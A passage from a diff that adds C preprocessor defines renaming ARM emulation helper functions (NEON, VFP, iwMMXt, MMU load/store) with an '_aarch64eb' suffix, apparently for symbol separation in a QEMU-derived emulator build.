+#define helper_dc_zva helper_dc_zva_aarch64eb +#define helper_double_saturate helper_double_saturate_aarch64eb +#define helper_exception_internal helper_exception_internal_aarch64eb +#define helper_exception_return helper_exception_return_aarch64eb +#define helper_exception_with_syndrome helper_exception_with_syndrome_aarch64eb +#define helper_get_cp_reg helper_get_cp_reg_aarch64eb +#define helper_get_cp_reg64 helper_get_cp_reg64_aarch64eb +#define helper_get_r13_banked helper_get_r13_banked_aarch64eb +#define helper_get_user_reg helper_get_user_reg_aarch64eb +#define helper_iwmmxt_addcb helper_iwmmxt_addcb_aarch64eb +#define helper_iwmmxt_addcl helper_iwmmxt_addcl_aarch64eb +#define helper_iwmmxt_addcw helper_iwmmxt_addcw_aarch64eb +#define helper_iwmmxt_addnb helper_iwmmxt_addnb_aarch64eb +#define helper_iwmmxt_addnl helper_iwmmxt_addnl_aarch64eb +#define helper_iwmmxt_addnw helper_iwmmxt_addnw_aarch64eb +#define helper_iwmmxt_addsb helper_iwmmxt_addsb_aarch64eb +#define helper_iwmmxt_addsl helper_iwmmxt_addsl_aarch64eb +#define helper_iwmmxt_addsw helper_iwmmxt_addsw_aarch64eb +#define helper_iwmmxt_addub helper_iwmmxt_addub_aarch64eb +#define helper_iwmmxt_addul helper_iwmmxt_addul_aarch64eb +#define helper_iwmmxt_adduw helper_iwmmxt_adduw_aarch64eb +#define helper_iwmmxt_align helper_iwmmxt_align_aarch64eb +#define helper_iwmmxt_avgb0 helper_iwmmxt_avgb0_aarch64eb +#define helper_iwmmxt_avgb1 helper_iwmmxt_avgb1_aarch64eb +#define helper_iwmmxt_avgw0 helper_iwmmxt_avgw0_aarch64eb +#define helper_iwmmxt_avgw1 helper_iwmmxt_avgw1_aarch64eb +#define helper_iwmmxt_bcstb helper_iwmmxt_bcstb_aarch64eb +#define helper_iwmmxt_bcstl helper_iwmmxt_bcstl_aarch64eb +#define helper_iwmmxt_bcstw helper_iwmmxt_bcstw_aarch64eb +#define helper_iwmmxt_cmpeqb helper_iwmmxt_cmpeqb_aarch64eb +#define helper_iwmmxt_cmpeql helper_iwmmxt_cmpeql_aarch64eb +#define helper_iwmmxt_cmpeqw helper_iwmmxt_cmpeqw_aarch64eb +#define helper_iwmmxt_cmpgtsb helper_iwmmxt_cmpgtsb_aarch64eb +#define helper_iwmmxt_cmpgtsl helper_iwmmxt_cmpgtsl_aarch64eb +#define helper_iwmmxt_cmpgtsw helper_iwmmxt_cmpgtsw_aarch64eb +#define helper_iwmmxt_cmpgtub helper_iwmmxt_cmpgtub_aarch64eb +#define helper_iwmmxt_cmpgtul helper_iwmmxt_cmpgtul_aarch64eb +#define helper_iwmmxt_cmpgtuw helper_iwmmxt_cmpgtuw_aarch64eb +#define helper_iwmmxt_insr helper_iwmmxt_insr_aarch64eb +#define helper_iwmmxt_macsw helper_iwmmxt_macsw_aarch64eb +#define helper_iwmmxt_macuw helper_iwmmxt_macuw_aarch64eb +#define helper_iwmmxt_maddsq helper_iwmmxt_maddsq_aarch64eb +#define helper_iwmmxt_madduq helper_iwmmxt_madduq_aarch64eb +#define helper_iwmmxt_maxsb helper_iwmmxt_maxsb_aarch64eb +#define helper_iwmmxt_maxsl helper_iwmmxt_maxsl_aarch64eb +#define helper_iwmmxt_maxsw helper_iwmmxt_maxsw_aarch64eb +#define helper_iwmmxt_maxub helper_iwmmxt_maxub_aarch64eb +#define helper_iwmmxt_maxul helper_iwmmxt_maxul_aarch64eb +#define helper_iwmmxt_maxuw helper_iwmmxt_maxuw_aarch64eb +#define helper_iwmmxt_minsb helper_iwmmxt_minsb_aarch64eb +#define helper_iwmmxt_minsl helper_iwmmxt_minsl_aarch64eb +#define helper_iwmmxt_minsw helper_iwmmxt_minsw_aarch64eb +#define helper_iwmmxt_minub helper_iwmmxt_minub_aarch64eb +#define helper_iwmmxt_minul helper_iwmmxt_minul_aarch64eb +#define helper_iwmmxt_minuw helper_iwmmxt_minuw_aarch64eb +#define helper_iwmmxt_msbb helper_iwmmxt_msbb_aarch64eb +#define helper_iwmmxt_msbl helper_iwmmxt_msbl_aarch64eb +#define helper_iwmmxt_msbw helper_iwmmxt_msbw_aarch64eb +#define helper_iwmmxt_muladdsl helper_iwmmxt_muladdsl_aarch64eb +#define helper_iwmmxt_muladdsw helper_iwmmxt_muladdsw_aarch64eb +#define helper_iwmmxt_muladdswl helper_iwmmxt_muladdswl_aarch64eb +#define helper_iwmmxt_mulshw helper_iwmmxt_mulshw_aarch64eb +#define helper_iwmmxt_mulslw helper_iwmmxt_mulslw_aarch64eb +#define helper_iwmmxt_muluhw helper_iwmmxt_muluhw_aarch64eb +#define helper_iwmmxt_mululw helper_iwmmxt_mululw_aarch64eb +#define helper_iwmmxt_packsl helper_iwmmxt_packsl_aarch64eb +#define helper_iwmmxt_packsq helper_iwmmxt_packsq_aarch64eb +#define helper_iwmmxt_packsw helper_iwmmxt_packsw_aarch64eb +#define helper_iwmmxt_packul helper_iwmmxt_packul_aarch64eb +#define helper_iwmmxt_packuq helper_iwmmxt_packuq_aarch64eb +#define helper_iwmmxt_packuw helper_iwmmxt_packuw_aarch64eb +#define helper_iwmmxt_rorl helper_iwmmxt_rorl_aarch64eb +#define helper_iwmmxt_rorq helper_iwmmxt_rorq_aarch64eb +#define helper_iwmmxt_rorw helper_iwmmxt_rorw_aarch64eb +#define helper_iwmmxt_sadb helper_iwmmxt_sadb_aarch64eb +#define helper_iwmmxt_sadw helper_iwmmxt_sadw_aarch64eb +#define helper_iwmmxt_setpsr_nz helper_iwmmxt_setpsr_nz_aarch64eb +#define helper_iwmmxt_shufh helper_iwmmxt_shufh_aarch64eb +#define helper_iwmmxt_slll helper_iwmmxt_slll_aarch64eb +#define helper_iwmmxt_sllq helper_iwmmxt_sllq_aarch64eb +#define helper_iwmmxt_sllw helper_iwmmxt_sllw_aarch64eb +#define helper_iwmmxt_sral helper_iwmmxt_sral_aarch64eb +#define helper_iwmmxt_sraq helper_iwmmxt_sraq_aarch64eb +#define helper_iwmmxt_sraw helper_iwmmxt_sraw_aarch64eb +#define helper_iwmmxt_srll helper_iwmmxt_srll_aarch64eb +#define helper_iwmmxt_srlq helper_iwmmxt_srlq_aarch64eb +#define helper_iwmmxt_srlw helper_iwmmxt_srlw_aarch64eb +#define helper_iwmmxt_subnb helper_iwmmxt_subnb_aarch64eb +#define helper_iwmmxt_subnl helper_iwmmxt_subnl_aarch64eb +#define helper_iwmmxt_subnw helper_iwmmxt_subnw_aarch64eb +#define helper_iwmmxt_subsb helper_iwmmxt_subsb_aarch64eb +#define helper_iwmmxt_subsl helper_iwmmxt_subsl_aarch64eb +#define helper_iwmmxt_subsw helper_iwmmxt_subsw_aarch64eb +#define helper_iwmmxt_subub helper_iwmmxt_subub_aarch64eb +#define helper_iwmmxt_subul helper_iwmmxt_subul_aarch64eb +#define helper_iwmmxt_subuw helper_iwmmxt_subuw_aarch64eb +#define helper_iwmmxt_unpackhb helper_iwmmxt_unpackhb_aarch64eb +#define helper_iwmmxt_unpackhl helper_iwmmxt_unpackhl_aarch64eb +#define helper_iwmmxt_unpackhsb helper_iwmmxt_unpackhsb_aarch64eb +#define helper_iwmmxt_unpackhsl helper_iwmmxt_unpackhsl_aarch64eb +#define helper_iwmmxt_unpackhsw helper_iwmmxt_unpackhsw_aarch64eb +#define helper_iwmmxt_unpackhub helper_iwmmxt_unpackhub_aarch64eb +#define helper_iwmmxt_unpackhul helper_iwmmxt_unpackhul_aarch64eb +#define helper_iwmmxt_unpackhuw helper_iwmmxt_unpackhuw_aarch64eb +#define helper_iwmmxt_unpackhw helper_iwmmxt_unpackhw_aarch64eb +#define helper_iwmmxt_unpacklb helper_iwmmxt_unpacklb_aarch64eb +#define helper_iwmmxt_unpackll helper_iwmmxt_unpackll_aarch64eb +#define helper_iwmmxt_unpacklsb helper_iwmmxt_unpacklsb_aarch64eb +#define helper_iwmmxt_unpacklsl helper_iwmmxt_unpacklsl_aarch64eb +#define helper_iwmmxt_unpacklsw helper_iwmmxt_unpacklsw_aarch64eb +#define helper_iwmmxt_unpacklub helper_iwmmxt_unpacklub_aarch64eb +#define helper_iwmmxt_unpacklul helper_iwmmxt_unpacklul_aarch64eb +#define helper_iwmmxt_unpackluw helper_iwmmxt_unpackluw_aarch64eb +#define helper_iwmmxt_unpacklw helper_iwmmxt_unpacklw_aarch64eb +#define helper_ldb_cmmu helper_ldb_cmmu_aarch64eb +#define helper_ldb_mmu helper_ldb_mmu_aarch64eb +#define helper_ldl_cmmu helper_ldl_cmmu_aarch64eb +#define helper_ldl_mmu helper_ldl_mmu_aarch64eb +#define helper_ldq_cmmu helper_ldq_cmmu_aarch64eb +#define helper_ldq_mmu helper_ldq_mmu_aarch64eb +#define helper_ldw_cmmu helper_ldw_cmmu_aarch64eb +#define helper_ldw_mmu helper_ldw_mmu_aarch64eb +#define helper_le_ldl_cmmu helper_le_ldl_cmmu_aarch64eb +#define helper_le_ldq_cmmu helper_le_ldq_cmmu_aarch64eb +#define helper_le_ldq_mmu helper_le_ldq_mmu_aarch64eb +#define helper_le_ldsl_mmu helper_le_ldsl_mmu_aarch64eb +#define helper_le_ldsw_mmu helper_le_ldsw_mmu_aarch64eb +#define helper_le_ldul_mmu helper_le_ldul_mmu_aarch64eb +#define helper_le_lduw_mmu helper_le_lduw_mmu_aarch64eb +#define helper_le_ldw_cmmu helper_le_ldw_cmmu_aarch64eb +#define helper_le_stl_mmu helper_le_stl_mmu_aarch64eb +#define helper_le_stq_mmu helper_le_stq_mmu_aarch64eb +#define helper_le_stw_mmu helper_le_stw_mmu_aarch64eb +#define helper_msr_i_pstate helper_msr_i_pstate_aarch64eb +#define helper_neon_abd_f32 helper_neon_abd_f32_aarch64eb +#define helper_neon_abdl_s16 helper_neon_abdl_s16_aarch64eb +#define helper_neon_abdl_s32 helper_neon_abdl_s32_aarch64eb +#define helper_neon_abdl_s64 helper_neon_abdl_s64_aarch64eb +#define helper_neon_abdl_u16 helper_neon_abdl_u16_aarch64eb +#define helper_neon_abdl_u32 helper_neon_abdl_u32_aarch64eb +#define helper_neon_abdl_u64 helper_neon_abdl_u64_aarch64eb +#define helper_neon_abd_s16 helper_neon_abd_s16_aarch64eb +#define helper_neon_abd_s32 helper_neon_abd_s32_aarch64eb +#define helper_neon_abd_s8 helper_neon_abd_s8_aarch64eb +#define helper_neon_abd_u16 helper_neon_abd_u16_aarch64eb +#define helper_neon_abd_u32 helper_neon_abd_u32_aarch64eb +#define helper_neon_abd_u8 helper_neon_abd_u8_aarch64eb +#define helper_neon_abs_s16 helper_neon_abs_s16_aarch64eb +#define helper_neon_abs_s8 helper_neon_abs_s8_aarch64eb +#define helper_neon_acge_f32 helper_neon_acge_f32_aarch64eb +#define helper_neon_acge_f64 helper_neon_acge_f64_aarch64eb +#define helper_neon_acgt_f32 helper_neon_acgt_f32_aarch64eb +#define helper_neon_acgt_f64 helper_neon_acgt_f64_aarch64eb +#define helper_neon_addl_saturate_s32 helper_neon_addl_saturate_s32_aarch64eb +#define helper_neon_addl_saturate_s64 helper_neon_addl_saturate_s64_aarch64eb +#define helper_neon_addl_u16 helper_neon_addl_u16_aarch64eb +#define helper_neon_addl_u32 helper_neon_addl_u32_aarch64eb +#define helper_neon_add_u16 helper_neon_add_u16_aarch64eb +#define helper_neon_add_u8 helper_neon_add_u8_aarch64eb +#define helper_neon_ceq_f32 helper_neon_ceq_f32_aarch64eb +#define helper_neon_ceq_u16 helper_neon_ceq_u16_aarch64eb +#define helper_neon_ceq_u32 helper_neon_ceq_u32_aarch64eb +#define helper_neon_ceq_u8 helper_neon_ceq_u8_aarch64eb +#define helper_neon_cge_f32 helper_neon_cge_f32_aarch64eb +#define helper_neon_cge_s16 helper_neon_cge_s16_aarch64eb +#define helper_neon_cge_s32 helper_neon_cge_s32_aarch64eb +#define helper_neon_cge_s8 helper_neon_cge_s8_aarch64eb +#define helper_neon_cge_u16 helper_neon_cge_u16_aarch64eb +#define helper_neon_cge_u32 helper_neon_cge_u32_aarch64eb +#define helper_neon_cge_u8 helper_neon_cge_u8_aarch64eb +#define helper_neon_cgt_f32 helper_neon_cgt_f32_aarch64eb +#define helper_neon_cgt_s16 helper_neon_cgt_s16_aarch64eb +#define helper_neon_cgt_s32 helper_neon_cgt_s32_aarch64eb +#define helper_neon_cgt_s8 helper_neon_cgt_s8_aarch64eb +#define helper_neon_cgt_u16 helper_neon_cgt_u16_aarch64eb +#define helper_neon_cgt_u32 helper_neon_cgt_u32_aarch64eb +#define helper_neon_cgt_u8 helper_neon_cgt_u8_aarch64eb +#define helper_neon_cls_s16 helper_neon_cls_s16_aarch64eb +#define helper_neon_cls_s32 helper_neon_cls_s32_aarch64eb +#define helper_neon_cls_s8 helper_neon_cls_s8_aarch64eb +#define helper_neon_clz_u16 helper_neon_clz_u16_aarch64eb +#define helper_neon_clz_u8 helper_neon_clz_u8_aarch64eb +#define helper_neon_cnt_u8 helper_neon_cnt_u8_aarch64eb +#define helper_neon_fcvt_f16_to_f32 helper_neon_fcvt_f16_to_f32_aarch64eb +#define helper_neon_fcvt_f32_to_f16 helper_neon_fcvt_f32_to_f16_aarch64eb +#define helper_neon_hadd_s16 helper_neon_hadd_s16_aarch64eb +#define helper_neon_hadd_s32 helper_neon_hadd_s32_aarch64eb +#define helper_neon_hadd_s8 helper_neon_hadd_s8_aarch64eb +#define helper_neon_hadd_u16 helper_neon_hadd_u16_aarch64eb +#define helper_neon_hadd_u32 helper_neon_hadd_u32_aarch64eb +#define helper_neon_hadd_u8 helper_neon_hadd_u8_aarch64eb +#define helper_neon_hsub_s16 helper_neon_hsub_s16_aarch64eb +#define helper_neon_hsub_s32 helper_neon_hsub_s32_aarch64eb +#define helper_neon_hsub_s8 helper_neon_hsub_s8_aarch64eb +#define helper_neon_hsub_u16 helper_neon_hsub_u16_aarch64eb +#define helper_neon_hsub_u32 helper_neon_hsub_u32_aarch64eb +#define helper_neon_hsub_u8 helper_neon_hsub_u8_aarch64eb +#define helper_neon_max_s16 helper_neon_max_s16_aarch64eb +#define helper_neon_max_s32 helper_neon_max_s32_aarch64eb +#define helper_neon_max_s8 helper_neon_max_s8_aarch64eb +#define helper_neon_max_u16 helper_neon_max_u16_aarch64eb +#define helper_neon_max_u32 helper_neon_max_u32_aarch64eb +#define helper_neon_max_u8 helper_neon_max_u8_aarch64eb +#define helper_neon_min_s16 helper_neon_min_s16_aarch64eb +#define helper_neon_min_s32 helper_neon_min_s32_aarch64eb +#define helper_neon_min_s8 helper_neon_min_s8_aarch64eb +#define helper_neon_min_u16 helper_neon_min_u16_aarch64eb +#define helper_neon_min_u32 helper_neon_min_u32_aarch64eb +#define helper_neon_min_u8 helper_neon_min_u8_aarch64eb +#define helper_neon_mull_p8 helper_neon_mull_p8_aarch64eb +#define helper_neon_mull_s16 helper_neon_mull_s16_aarch64eb +#define helper_neon_mull_s8 helper_neon_mull_s8_aarch64eb +#define helper_neon_mull_u16 helper_neon_mull_u16_aarch64eb +#define helper_neon_mull_u8 helper_neon_mull_u8_aarch64eb +#define helper_neon_mul_p8 helper_neon_mul_p8_aarch64eb +#define helper_neon_mul_u16 helper_neon_mul_u16_aarch64eb +#define helper_neon_mul_u8 helper_neon_mul_u8_aarch64eb +#define helper_neon_narrow_high_u16 helper_neon_narrow_high_u16_aarch64eb +#define helper_neon_narrow_high_u8 helper_neon_narrow_high_u8_aarch64eb +#define helper_neon_narrow_round_high_u16 helper_neon_narrow_round_high_u16_aarch64eb +#define helper_neon_narrow_round_high_u8 helper_neon_narrow_round_high_u8_aarch64eb +#define helper_neon_narrow_sat_s16 helper_neon_narrow_sat_s16_aarch64eb +#define helper_neon_narrow_sat_s32 helper_neon_narrow_sat_s32_aarch64eb +#define helper_neon_narrow_sat_s8 helper_neon_narrow_sat_s8_aarch64eb +#define helper_neon_narrow_sat_u16 helper_neon_narrow_sat_u16_aarch64eb +#define helper_neon_narrow_sat_u32 helper_neon_narrow_sat_u32_aarch64eb +#define helper_neon_narrow_sat_u8 helper_neon_narrow_sat_u8_aarch64eb +#define helper_neon_narrow_u16 helper_neon_narrow_u16_aarch64eb +#define helper_neon_narrow_u8 helper_neon_narrow_u8_aarch64eb +#define helper_neon_negl_u16 helper_neon_negl_u16_aarch64eb +#define helper_neon_negl_u32 helper_neon_negl_u32_aarch64eb +#define helper_neon_paddl_u16 helper_neon_paddl_u16_aarch64eb +#define helper_neon_paddl_u32 helper_neon_paddl_u32_aarch64eb +#define helper_neon_padd_u16 helper_neon_padd_u16_aarch64eb +#define helper_neon_padd_u8 helper_neon_padd_u8_aarch64eb +#define helper_neon_pmax_s16 helper_neon_pmax_s16_aarch64eb +#define helper_neon_pmax_s8 helper_neon_pmax_s8_aarch64eb +#define helper_neon_pmax_u16 helper_neon_pmax_u16_aarch64eb +#define helper_neon_pmax_u8 helper_neon_pmax_u8_aarch64eb +#define helper_neon_pmin_s16 helper_neon_pmin_s16_aarch64eb +#define helper_neon_pmin_s8 helper_neon_pmin_s8_aarch64eb +#define helper_neon_pmin_u16 helper_neon_pmin_u16_aarch64eb +#define helper_neon_pmin_u8 helper_neon_pmin_u8_aarch64eb +#define helper_neon_pmull_64_hi helper_neon_pmull_64_hi_aarch64eb +#define helper_neon_pmull_64_lo helper_neon_pmull_64_lo_aarch64eb +#define helper_neon_qabs_s16 helper_neon_qabs_s16_aarch64eb +#define helper_neon_qabs_s32 helper_neon_qabs_s32_aarch64eb +#define helper_neon_qabs_s64 helper_neon_qabs_s64_aarch64eb +#define helper_neon_qabs_s8 helper_neon_qabs_s8_aarch64eb +#define helper_neon_qadd_s16 helper_neon_qadd_s16_aarch64eb +#define helper_neon_qadd_s32 helper_neon_qadd_s32_aarch64eb +#define helper_neon_qadd_s64 helper_neon_qadd_s64_aarch64eb +#define helper_neon_qadd_s8 helper_neon_qadd_s8_aarch64eb +#define helper_neon_qadd_u16 helper_neon_qadd_u16_aarch64eb +#define helper_neon_qadd_u32 helper_neon_qadd_u32_aarch64eb +#define helper_neon_qadd_u64 helper_neon_qadd_u64_aarch64eb +#define helper_neon_qadd_u8 helper_neon_qadd_u8_aarch64eb +#define helper_neon_qdmulh_s16 helper_neon_qdmulh_s16_aarch64eb +#define helper_neon_qdmulh_s32 helper_neon_qdmulh_s32_aarch64eb +#define helper_neon_qneg_s16 helper_neon_qneg_s16_aarch64eb +#define helper_neon_qneg_s32 helper_neon_qneg_s32_aarch64eb +#define helper_neon_qneg_s64 helper_neon_qneg_s64_aarch64eb +#define helper_neon_qneg_s8 helper_neon_qneg_s8_aarch64eb +#define helper_neon_qrdmulh_s16 helper_neon_qrdmulh_s16_aarch64eb +#define helper_neon_qrdmulh_s32 helper_neon_qrdmulh_s32_aarch64eb +#define helper_neon_qrshl_s16 helper_neon_qrshl_s16_aarch64eb +#define helper_neon_qrshl_s32 helper_neon_qrshl_s32_aarch64eb +#define helper_neon_qrshl_s64 helper_neon_qrshl_s64_aarch64eb +#define helper_neon_qrshl_s8 helper_neon_qrshl_s8_aarch64eb +#define helper_neon_qrshl_u16 helper_neon_qrshl_u16_aarch64eb +#define helper_neon_qrshl_u32 helper_neon_qrshl_u32_aarch64eb +#define helper_neon_qrshl_u64 helper_neon_qrshl_u64_aarch64eb +#define helper_neon_qrshl_u8 helper_neon_qrshl_u8_aarch64eb +#define helper_neon_qshl_s16 helper_neon_qshl_s16_aarch64eb +#define helper_neon_qshl_s32 helper_neon_qshl_s32_aarch64eb +#define helper_neon_qshl_s64 helper_neon_qshl_s64_aarch64eb +#define helper_neon_qshl_s8 helper_neon_qshl_s8_aarch64eb +#define helper_neon_qshl_u16 helper_neon_qshl_u16_aarch64eb +#define helper_neon_qshl_u32 helper_neon_qshl_u32_aarch64eb +#define helper_neon_qshl_u64 helper_neon_qshl_u64_aarch64eb +#define helper_neon_qshl_u8 helper_neon_qshl_u8_aarch64eb +#define helper_neon_qshlu_s16 helper_neon_qshlu_s16_aarch64eb +#define helper_neon_qshlu_s32 helper_neon_qshlu_s32_aarch64eb +#define helper_neon_qshlu_s64 helper_neon_qshlu_s64_aarch64eb +#define helper_neon_qshlu_s8 helper_neon_qshlu_s8_aarch64eb +#define helper_neon_qsub_s16 helper_neon_qsub_s16_aarch64eb +#define helper_neon_qsub_s32 helper_neon_qsub_s32_aarch64eb +#define helper_neon_qsub_s64 helper_neon_qsub_s64_aarch64eb +#define helper_neon_qsub_s8 helper_neon_qsub_s8_aarch64eb +#define helper_neon_qsub_u16 helper_neon_qsub_u16_aarch64eb +#define helper_neon_qsub_u32 helper_neon_qsub_u32_aarch64eb +#define helper_neon_qsub_u64 helper_neon_qsub_u64_aarch64eb +#define helper_neon_qsub_u8 helper_neon_qsub_u8_aarch64eb +#define helper_neon_qunzip16 helper_neon_qunzip16_aarch64eb +#define helper_neon_qunzip32 helper_neon_qunzip32_aarch64eb +#define helper_neon_qunzip8 helper_neon_qunzip8_aarch64eb +#define helper_neon_qzip16 helper_neon_qzip16_aarch64eb +#define helper_neon_qzip32 helper_neon_qzip32_aarch64eb +#define helper_neon_qzip8 helper_neon_qzip8_aarch64eb +#define helper_neon_rbit_u8 helper_neon_rbit_u8_aarch64eb +#define helper_neon_rhadd_s16 helper_neon_rhadd_s16_aarch64eb +#define helper_neon_rhadd_s32 helper_neon_rhadd_s32_aarch64eb +#define helper_neon_rhadd_s8 helper_neon_rhadd_s8_aarch64eb +#define helper_neon_rhadd_u16 helper_neon_rhadd_u16_aarch64eb +#define helper_neon_rhadd_u32 helper_neon_rhadd_u32_aarch64eb +#define helper_neon_rhadd_u8 helper_neon_rhadd_u8_aarch64eb +#define helper_neon_rshl_s16 helper_neon_rshl_s16_aarch64eb +#define helper_neon_rshl_s32 helper_neon_rshl_s32_aarch64eb +#define helper_neon_rshl_s64 helper_neon_rshl_s64_aarch64eb +#define helper_neon_rshl_s8 helper_neon_rshl_s8_aarch64eb +#define helper_neon_rshl_u16 helper_neon_rshl_u16_aarch64eb +#define helper_neon_rshl_u32 helper_neon_rshl_u32_aarch64eb +#define helper_neon_rshl_u64 helper_neon_rshl_u64_aarch64eb +#define helper_neon_rshl_u8 helper_neon_rshl_u8_aarch64eb +#define helper_neon_shl_s16 helper_neon_shl_s16_aarch64eb +#define helper_neon_shl_s32 helper_neon_shl_s32_aarch64eb +#define helper_neon_shl_s64 helper_neon_shl_s64_aarch64eb +#define helper_neon_shl_s8 helper_neon_shl_s8_aarch64eb +#define helper_neon_shl_u16 helper_neon_shl_u16_aarch64eb +#define helper_neon_shl_u32 helper_neon_shl_u32_aarch64eb +#define helper_neon_shl_u64 helper_neon_shl_u64_aarch64eb +#define helper_neon_shl_u8 helper_neon_shl_u8_aarch64eb +#define helper_neon_sqadd_u16 helper_neon_sqadd_u16_aarch64eb +#define helper_neon_sqadd_u32 helper_neon_sqadd_u32_aarch64eb +#define helper_neon_sqadd_u64 helper_neon_sqadd_u64_aarch64eb +#define helper_neon_sqadd_u8 helper_neon_sqadd_u8_aarch64eb +#define helper_neon_subl_u16 helper_neon_subl_u16_aarch64eb +#define helper_neon_subl_u32 helper_neon_subl_u32_aarch64eb +#define helper_neon_sub_u16 helper_neon_sub_u16_aarch64eb +#define helper_neon_sub_u8 helper_neon_sub_u8_aarch64eb +#define helper_neon_tbl helper_neon_tbl_aarch64eb +#define helper_neon_tst_u16 helper_neon_tst_u16_aarch64eb +#define helper_neon_tst_u32 helper_neon_tst_u32_aarch64eb +#define helper_neon_tst_u8 helper_neon_tst_u8_aarch64eb +#define helper_neon_unarrow_sat16 helper_neon_unarrow_sat16_aarch64eb +#define helper_neon_unarrow_sat32 helper_neon_unarrow_sat32_aarch64eb +#define helper_neon_unarrow_sat8 helper_neon_unarrow_sat8_aarch64eb +#define helper_neon_unzip16 helper_neon_unzip16_aarch64eb +#define helper_neon_unzip8 helper_neon_unzip8_aarch64eb +#define helper_neon_uqadd_s16 helper_neon_uqadd_s16_aarch64eb +#define helper_neon_uqadd_s32 helper_neon_uqadd_s32_aarch64eb +#define helper_neon_uqadd_s64 helper_neon_uqadd_s64_aarch64eb +#define helper_neon_uqadd_s8 helper_neon_uqadd_s8_aarch64eb +#define helper_neon_widen_s16 helper_neon_widen_s16_aarch64eb +#define helper_neon_widen_s8 helper_neon_widen_s8_aarch64eb +#define helper_neon_widen_u16 helper_neon_widen_u16_aarch64eb +#define helper_neon_widen_u8 helper_neon_widen_u8_aarch64eb +#define helper_neon_zip16 helper_neon_zip16_aarch64eb +#define helper_neon_zip8 helper_neon_zip8_aarch64eb +#define helper_pre_hvc helper_pre_hvc_aarch64eb +#define helper_pre_smc helper_pre_smc_aarch64eb +#define helper_qadd16 helper_qadd16_aarch64eb +#define helper_qadd8 helper_qadd8_aarch64eb +#define helper_qaddsubx helper_qaddsubx_aarch64eb +#define helper_qsub16 helper_qsub16_aarch64eb +#define helper_qsub8 helper_qsub8_aarch64eb +#define helper_qsubaddx helper_qsubaddx_aarch64eb +#define helper_rbit helper_rbit_aarch64eb +#define helper_recpe_f32 helper_recpe_f32_aarch64eb +#define helper_recpe_f64 helper_recpe_f64_aarch64eb +#define helper_recpe_u32 helper_recpe_u32_aarch64eb +#define helper_recps_f32 helper_recps_f32_aarch64eb +#define helper_ret_ldb_cmmu helper_ret_ldb_cmmu_aarch64eb +#define helper_ret_ldsb_mmu helper_ret_ldsb_mmu_aarch64eb +#define helper_ret_ldub_mmu helper_ret_ldub_mmu_aarch64eb +#define helper_ret_stb_mmu helper_ret_stb_mmu_aarch64eb +#define helper_rintd helper_rintd_aarch64eb +#define helper_rintd_exact helper_rintd_exact_aarch64eb +#define helper_rints helper_rints_aarch64eb +#define helper_rints_exact helper_rints_exact_aarch64eb +#define helper_ror_cc helper_ror_cc_aarch64eb +#define helper_rsqrte_f32 helper_rsqrte_f32_aarch64eb +#define helper_rsqrte_f64 helper_rsqrte_f64_aarch64eb +#define helper_rsqrte_u32 helper_rsqrte_u32_aarch64eb +#define helper_rsqrts_f32 helper_rsqrts_f32_aarch64eb +#define helper_sadd16 helper_sadd16_aarch64eb +#define helper_sadd8 helper_sadd8_aarch64eb +#define helper_saddsubx helper_saddsubx_aarch64eb +#define helper_sar_cc helper_sar_cc_aarch64eb +#define helper_sdiv helper_sdiv_aarch64eb +#define helper_sel_flags helper_sel_flags_aarch64eb +#define helper_set_cp_reg helper_set_cp_reg_aarch64eb +#define helper_set_cp_reg64 helper_set_cp_reg64_aarch64eb +#define helper_set_neon_rmode helper_set_neon_rmode_aarch64eb +#define helper_set_r13_banked helper_set_r13_banked_aarch64eb +#define helper_set_rmode helper_set_rmode_aarch64eb +#define helper_set_user_reg helper_set_user_reg_aarch64eb +#define helper_shadd16 helper_shadd16_aarch64eb +#define helper_shadd8 helper_shadd8_aarch64eb +#define helper_shaddsubx helper_shaddsubx_aarch64eb +#define helper_shl_cc helper_shl_cc_aarch64eb +#define helper_shr_cc helper_shr_cc_aarch64eb +#define helper_shsub16 helper_shsub16_aarch64eb +#define helper_shsub8 helper_shsub8_aarch64eb +#define helper_shsubaddx helper_shsubaddx_aarch64eb +#define helper_ssat helper_ssat_aarch64eb +#define helper_ssat16 helper_ssat16_aarch64eb +#define helper_ssub16 helper_ssub16_aarch64eb +#define helper_ssub8 helper_ssub8_aarch64eb +#define helper_ssubaddx helper_ssubaddx_aarch64eb +#define helper_stb_mmu helper_stb_mmu_aarch64eb +#define helper_stl_mmu helper_stl_mmu_aarch64eb +#define helper_stq_mmu helper_stq_mmu_aarch64eb +#define helper_stw_mmu helper_stw_mmu_aarch64eb +#define helper_sub_saturate helper_sub_saturate_aarch64eb +#define helper_sub_usaturate helper_sub_usaturate_aarch64eb +#define helper_sxtb16 helper_sxtb16_aarch64eb +#define helper_uadd16 helper_uadd16_aarch64eb +#define helper_uadd8 helper_uadd8_aarch64eb +#define helper_uaddsubx helper_uaddsubx_aarch64eb +#define helper_udiv helper_udiv_aarch64eb +#define helper_uhadd16 helper_uhadd16_aarch64eb +#define helper_uhadd8 helper_uhadd8_aarch64eb +#define helper_uhaddsubx helper_uhaddsubx_aarch64eb +#define helper_uhsub16 helper_uhsub16_aarch64eb +#define helper_uhsub8 helper_uhsub8_aarch64eb +#define helper_uhsubaddx helper_uhsubaddx_aarch64eb +#define helper_uqadd16 helper_uqadd16_aarch64eb +#define helper_uqadd8 helper_uqadd8_aarch64eb +#define helper_uqaddsubx helper_uqaddsubx_aarch64eb +#define helper_uqsub16 helper_uqsub16_aarch64eb +#define helper_uqsub8 helper_uqsub8_aarch64eb +#define helper_uqsubaddx helper_uqsubaddx_aarch64eb +#define helper_usad8 helper_usad8_aarch64eb +#define helper_usat helper_usat_aarch64eb +#define helper_usat16 helper_usat16_aarch64eb +#define helper_usub16 helper_usub16_aarch64eb +#define helper_usub8 helper_usub8_aarch64eb +#define helper_usubaddx helper_usubaddx_aarch64eb +#define helper_uxtb16 helper_uxtb16_aarch64eb +#define helper_v7m_mrs helper_v7m_mrs_aarch64eb +#define helper_v7m_msr helper_v7m_msr_aarch64eb +#define helper_vfp_absd helper_vfp_absd_aarch64eb +#define helper_vfp_abss helper_vfp_abss_aarch64eb +#define helper_vfp_addd helper_vfp_addd_aarch64eb +#define helper_vfp_adds helper_vfp_adds_aarch64eb +#define helper_vfp_cmpd helper_vfp_cmpd_aarch64eb +#define helper_vfp_cmped helper_vfp_cmped_aarch64eb +#define helper_vfp_cmpes helper_vfp_cmpes_aarch64eb +#define helper_vfp_cmps helper_vfp_cmps_aarch64eb +#define helper_vfp_divd helper_vfp_divd_aarch64eb +#define helper_vfp_divs helper_vfp_divs_aarch64eb +#define helper_vfp_fcvtds helper_vfp_fcvtds_aarch64eb +#define helper_vfp_fcvt_f16_to_f32 